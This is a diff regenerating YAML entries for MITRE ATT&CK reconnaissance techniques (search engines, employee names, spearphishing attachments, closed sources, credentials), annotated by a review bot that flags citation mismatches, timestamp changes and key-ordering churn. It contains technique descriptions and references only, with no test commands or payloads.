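Review bot: the `SecurityTrails Google Hacking` and `ExploitDB GoogleHacking` references removed at the top of the T1593.002 object here must reappear in the following hunk with the same `source_name` values, since the description context line still cites both by name. The wording "typical crawl online sites to index context" on that context line is an upstream typo ("typically", "content"); out of scope for this sync but worth reporting upstream.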
@@ -55798,15 +56464,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
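Review bot: the `SecurityTrails Google Hacking` reference now points at `recordedfuture.com/.../google-dorks` with a 2024 retrieval date but keeps the author, title and date of the 2019 SecurityTrails post ("Borges, E. (2019, March 5). Exploring Google Hacking Techniques."), so the description no longer describes what the URL serves. Prefer a web.archive.org snapshot of the original securitytrails.com URL, as this patch already does for `Trails-DNS`, or update the author and title to the page actually linked. The rest of the hunk is the expected re-emission of `type`, `id`, `created`, `revoked: false` and the unchanged `ExploitDB GoogleHacking` entry.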
@@ -55828,7 +56517,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
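Review bot: `modified` moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:36:58.964Z', and the same backward move recurs in most `modified` hunks below (Client Configurations, CDNs, Firmware, Software, Social Media, Identify Roles, Wordlist Scanning). The old value is a round bulk timestamp shared by many objects while the new values are distinct per object, so this looks like the generator now taking the field straight from the bundle rather than a real regression; the techniques whose text actually changed (T1593, T1589.001, T1598) move forward to 2024 as expected. Please state the ATT&CK release the index was regenerated from in the PR description so the timestamp churn is explainable later.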
@@ -55844,8 +56533,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
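Review bot: for T1591.002 the trailing `x_mitre_attack_spec_version: 2.1.0` is removed together with `spec_version: '2.1'` and nothing is added in its place, unlike T1593.002 above where `x_mitre_attack_spec_version: 3.2.0` is re-inserted. Confirm the field still exists elsewhere in this object (the next hunk shows T1593.003 keeping `x_mitre_attack_spec_version: 3.0.0` two lines above its removed `spec_version`); if it does not, the technique loses its spec version entirely after this change.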
@@ -55906,29 +56593,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -55937,15 +56605,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -55971,7 +56658,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55989,47 +56676,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56038,19 +56688,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
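Review bot: most of this hunk is reordering rather than content: `x_mitre_modified_by_ref` is removed at one position and re-added at the end, the `external_references` list is re-sorted (ACSC now first), and `url` / `external_id` swap places in each reference. The substantive changes are limited to `x_mitre_deprecated: false`, `revoked: false`, the ACSC url moving to a web.archive.org snapshot, and the spec version bump to 3.2.0. If the generator can emit keys in a stable order (for example sorting keys when dumping), enabling that would keep future regeneration diffs reviewable.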
@@ -56073,7 +56759,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56089,8 +56775,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -56116,7 +56800,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56132,8 +56816,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -56161,7 +56843,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56177,12 +56859,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56191,16 +56871,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56213,8 +56893,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56225,52 +56905,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
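Review bot: the description edit drops the `(Citation: D3Secutrity CTI Feeds)` marker and the same hunk removes the matching `D3Secutrity CTI Feeds` entry from `external_references`, so no dangling citation remains and the misspelled source_name goes with it; the `x_mitre_version` bump from '1.0' to '1.1' is consistent with a text change. Because citation markers and reference entries are maintained separately, a regeneration check that every `(Citation: X)` in a description has an `external_references` item with `source_name: X` would catch this class of mismatch automatically.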
@@ -56292,7 +56970,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56308,8 +56986,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -56335,7 +57011,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56353,8 +57029,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56376,7 +57050,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56392,12 +57066,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56407,17 +57079,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
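Review bot: the three new citation markers in the rewritten description, `Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023` and `Bleeping Computer Stealer Logs 2023`, are each backed by a `source_name` entry added in the `external_references` hunks below, so the references are complete. Note that each marker is wrapped across two physical lines inside the double-quoted scalar (for example `(Citation: Bleeping Computer` / `Stealer Logs 2023)`); YAML folds that break into a single space, so the marker is intact once parsed, but any tooling that greps the raw file for `(Citation: ...)` will miss these and needs to parse the YAML first.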
@@ -56429,6 +57104,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56439,7 +57115,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56449,6 +57125,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56461,6 +57141,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56483,6 +57167,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56490,9 +57178,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56551,7 +57238,7 @@ reconnaissance:
